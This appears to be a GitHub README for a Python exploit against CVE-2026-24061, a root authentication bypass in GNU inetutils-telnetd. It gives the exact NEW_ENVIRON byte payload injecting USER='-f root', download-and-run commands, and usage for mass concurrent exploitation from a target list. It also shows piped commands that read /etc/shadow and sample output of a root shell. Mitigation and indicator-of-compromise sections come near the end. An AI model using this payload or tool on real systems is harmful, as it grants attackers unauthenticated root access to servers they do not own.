A security research tool for exploiting CVE-2026-24061, a critical remote authentication bypass vulnerability in GNU inetutils-telnetd that allows instant root shell access without authentication.
- Vulnerability Summary
- Affected Versions
- Technical Analysis
- Prerequisites
- Installation
- Usage
- Output Reference
- Exploitation Methodology
- Mitigation and Remediation
- Indicators of Compromise
- Legal Disclaimer
- References
- Credits
| Field | Value |
|---|---|
| CVE Identifier | CVE-2026-24061 |
| CVSS v3.1 Score | 9.8 (Critical) |
| CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CWE Classification | CWE-88: Improper Neutralization of Argument Delimiters in a Command |
| Vendor | GNU Project |
| Product | inetutils-telnetd |
| Disclosure Date | January 20, 2026 |
| Patch Available | TBD |
A critical vulnerability exists in GNU inetutils-telnetd through version 2.7 that allows unauthenticated remote attackers to bypass authentication entirely and gain immediate root shell access. The vulnerability is exploited through the NEW_ENVIRON telnet option by injecting a specially crafted USER environment variable with the value "-f root", which bypasses all authentication mechanisms.
- Confidentiality: Complete compromise of system data
- Integrity: Full system control with root privileges
- Availability: Potential for complete system takeover or denial of service
- Scope: Unchanged - exploitation affects only the vulnerable telnet service
| Version Range | Status |
|---|---|
| <= 2.7 | Vulnerable |
| > 2.7 | Patch Status TBD |
The vulnerability originates from improper validation of the USER environment variable in the telnetd NEW_ENVIRON option handler. When processing the NEW_ENVIRON telnet option, the telnetd service fails to sanitize the USER variable value before passing it to the login process. By setting USER to "-f root", the attacker injects command-line arguments that force the authentication to succeed for the root user without requiring credentials.
- Attacker connects to the telnetd service (typically port 23)
- During telnet option negotiation, the server requests NEW_ENVIRON data
- Attacker responds with USER environment variable set to "-f root"
- The malicious argument bypasses authentication checks
- Instant root shell is granted without any password prompt
- Full system compromise is achieved
- Prerequisites: Network access to target telnetd service
- Authentication: Not required
- User Interaction: None
- Attack Complexity: Low
- Python 3.7 or higher
- Network connectivity to target telnetd instance(s)
- Sufficient permissions to execute Python scripts
All dependencies are part of Python's standard library:
| Package | Purpose |
|---|---|
| socket | Network communication |
| select | I/O multiplexing |
| sys | System interaction |
| os | Operating system interface |
| threading | Concurrent target exploitation |
| datetime | Timestamp formatting |
# Clone the repository
git clone https://github.com/SystemVll/CVE-2026-24061.git
cd CVE-2026-24061
# Run the exploit
python3 main.py -u <target_ip># Download the exploit
curl -O https://raw.githubusercontent.com/SystemVll/CVE-2026-24061/main/main.py
# Make it executable (Linux/macOS)
chmod +x main.py
# Run the exploit
python3 main.py -u <target_ip># Ensure Python 3.7+ is installed
python3 --version
# Download and run
python3 main.py -u <target_ip>Usage:
python3 main.py -u <target_ip> [-p <port>] [-usr <user>]
python3 main.py -l <targets_file> [-p <port>] [-usr <user>]
echo "commands" | python3 main.py -u <target_ip>
Arguments:
-u Single target IP address or hostname
-l Path to file containing target IPs (one per line)
-p Target port (default: 23)
-usr User to exploit as (default: root)
Exploit a single telnetd instance:
# Basic exploitation (default port 23, user root)
python3 main.py -u 192.168.1.100
# Custom port
python3 main.py -u 192.168.1.100 -p 2323
# Different user
python3 main.py -u 192.168.1.100 -usr adminExecute commands non-interactively:
# Single command
echo "id; whoami; uname -a" | python3 main.py -u 192.168.1.100
# Multiple commands
echo "cat /etc/passwd; cat /etc/shadow" | python3 main.py -u 192.168.1.100
# Command with output redirection
echo "ps aux > /tmp/processes.txt" | python3 main.py -u 192.168.1.100Exploit multiple targets from a file:
python3 main.py -l targets.txt
python3 main.py -l targets.txt -p 2323
python3 main.py -l targets.txt -usr adminTarget File Format (targets.txt):
192.168.1.100
192.168.1.101
10.0.0.50
172.16.0.25
telnet.example.com
Notes:
- One target per line
- IP addresses or hostnames
- Empty lines are ignored
- Targets are exploited concurrently using threading
| Indicator | Color | Description |
|---|---|---|
[SUCCESS] |
Green | Successfully connected to target |
[EXPLOIT] |
Green | Exploitation payload sent successfully |
[INFO] |
Blue | Informational message about current operation |
[ERROR] |
Red | Connection failure, timeout, or exploitation error |
[WARNING] |
Yellow | Warning message (not currently used) |
╔═══════════════════════════════════════════════════════════════╗
║ CVE-2026-24061 - GNU inetutils-telnetd Auth Bypass ║
║ ║
║ CVSS Score: 9.8 (Critical) ║
║ Impact: Remote Authentication Bypass - Instant Root Shell ║
║ ║
║ This tool is part of the HGrab Framework. ║
╚═══════════════════════════════════════════════════════════════╝
[2026-01-23 14:32:15] [INFO] Target: 192.168.1.100:23, User: root
[2026-01-23 14:32:15] [SUCCESS] Connected to 192.168.1.100:23
[2026-01-23 14:32:15] [EXPLOIT] Sent payload: USER='-f root'
[2026-01-23 14:32:15] [INFO] Interactive mode - type commands
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
The exploit leverages the telnet protocol negotiation phase:
- Initial Connection: TCP connection established to target port
- Option Negotiation: Server sends DO/WILL commands for various telnet options
- TTYPE Agreement: Client agrees to send terminal type (WILL TTYPE)
- TSPEED Agreement: Client agrees to send terminal speed (WILL TSPEED)
- NEW_ENVIRON Agreement: Client agrees to send environment variables (WILL NEW_ENVIRON)
- Subnegotiation: Server requests environment variables (SB NEW_ENVIRON SEND)
- Payload Injection: Client sends USER="-f root" in NEW_ENVIRON response
- Authentication Bypass: Server processes malicious USER variable
- Shell Access: Root shell granted without authentication
# Telnet IAC (Interpret As Command) = 255
# SB (Subnegotiation Begin) = 250
# SE (Subnegotiation End) = 240
# NEW_ENVIRON option = 39
payload = bytes([
255, # IAC
250, # SB
39, # NEW_ENVIRON
0, # IS
0, # VAR
]) + b"USER" + bytes([1]) + b"-f root" + bytes([
255, # IAC
240 # SE
])- Input Multiplexing: Uses
select.select()for simultaneous socket and stdin monitoring - Non-blocking I/O: Socket configured for non-blocking operations
- Telnet Processing: IAC sequences stripped from output for clean display
- Timeout Management: 30-second timeout for command execution
-
Disable telnetd: Stop and disable the telnetd service immediately
# systemd-based systems sudo systemctl stop telnetd sudo systemctl disable telnetd # xinetd-based systems sudo service xinetd stop sudo chkconfig telnet off
-
Firewall Rules: Block telnet port (23) at the firewall level
# iptables sudo iptables -A INPUT -p tcp --dport 23 -j DROP # firewalld sudo firewall-cmd --permanent --remove-service=telnet sudo firewall-cmd --reload
-
Network Isolation: Remove telnet service from internet-facing systems
- Use internal network segments only
- Implement network access control lists (ACLs)
| Action | Priority | Description |
|---|---|---|
| SSH Migration | Critical | Replace telnet with SSH for remote access |
| Patch Management | Critical | Monitor for and apply security updates |
| Service Audit | High | Identify and disable unnecessary network services |
| Network Segmentation | High | Isolate critical systems from public networks |
| Intrusion Detection | Medium | Deploy IDS/IPS to detect exploitation attempts |
| Access Control | Medium | Implement IP whitelisting for remote services |
Use SSH instead of Telnet:
# Install OpenSSH server
sudo apt-get install openssh-server # Debian/Ubuntu
sudo yum install openssh-server # RHEL/CentOS
# Enable and start SSH
sudo systemctl enable sshd
sudo systemctl start sshd# Verify telnetd is not running
sudo netstat -tlnp | grep :23
sudo ss -tlnp | grep :23
# Should return no results if properly disabledReview system logs for the following patterns:
Authentication Logs:
# Check for unusual login patterns
sudo grep telnetd /var/log/auth.log
sudo grep telnetd /var/log/secure
# Look for suspicious USER environment variables
sudo grep "USER.*-f" /var/log/auth.logNetwork Logs:
- Telnet connections from unexpected IP addresses
- Connections to port 23 outside normal operating hours
- Multiple rapid connections to telnet service
- Unexpected processes running as root
- Modified system configuration files
- Unauthorized user accounts
- New SSH keys in /root/.ssh/authorized_keys
- Suspicious cron jobs or scheduled tasks
- Outbound connections from the telnet service process
- Data exfiltration to external hosts
- Reverse shell connections
- Port scanning activity originating from compromised system
- Lateral movement attempts to other internal systems
# Check for active telnet connections
sudo netstat -antp | grep :23
# Review recent root logins
sudo last | grep root
# Check for modified system files
sudo rpm -Va # RHEL/CentOS
sudo debsums -c # Debian/Ubuntu
# List processes by root
sudo ps aux | grep root
# Check for unauthorized SSH keys
sudo cat /root/.ssh/authorized_keysIMPORTANT: READ BEFORE USE
This tool is provided strictly for:
- Authorized security assessments and penetration testing
- Educational and research purposes in controlled environments
- Defensive security operations with proper authorization
- Vulnerability assessment of systems you own or have explicit permission to test
Prohibited Uses:
- Unauthorized access to computer systems or networks
- Exploitation of systems without explicit written consent from the owner
- Any activity that violates local, state, federal, or international laws
- Malicious activities or unauthorized system compromise
Liability: The authors, contributors, and distributors of this software assume NO responsibility or liability for misuse, damage, or illegal activities conducted with this tool. Users are solely responsible for:
- Ensuring compliance with all applicable laws and regulations
- Obtaining proper authorization before conducting security testing
- Any consequences resulting from the use or misuse of this software
Legal Notice: Unauthorized access to computer systems is a serious criminal offense. Violations may result in prosecution under:
- Computer Fraud and Abuse Act (CFAA) - United States (18 U.S.C. § 1030)
- Computer Misuse Act 1990 - United Kingdom
- European Union Directive on Attacks against Information Systems
- Similar legislation in other jurisdictions worldwide
Penalties may include imprisonment, substantial fines, and civil liability.
By using this tool, you acknowledge that you have read, understood, and agree to comply with this disclaimer and all applicable laws.
- NVD - CVE-2026-24061
- MITRE CVE Record
- OpenWall Disclosure (Jan 20, 2026)
- OpenWall Discussion (Jan 20, 2026)
- OpenWall Update (Jan 22, 2026)
- CWE-88: Improper Neutralization of Argument Delimiters
- Telnet Protocol Specification (RFC 854)
- Telnet Environment Option (RFC 1408)
- OWASP Command Injection
- Exploit Author: IRIS C2 Team
- Framework: Part of the HGrab Framework
- Discovery: Security Research Community
- Disclosure: OpenWall mailing list contributors
| Version | Date | Changes |
|---|---|---|
| 1.0.0 | 2026-01-23 | Initial release |
For questions, issues, or contributions:
- Issues: Report bugs or request features via GitHub Issues
- Security: Report vulnerabilities responsibly to the maintainers
- Contributions: Pull requests are welcome
This project is provided as-is for authorized security research and educational purposes only. No warranty is provided, express or implied. Use at your own risk and in accordance with all applicable laws and regulations.
USE ONLY WITH PROPER AUTHORIZATION
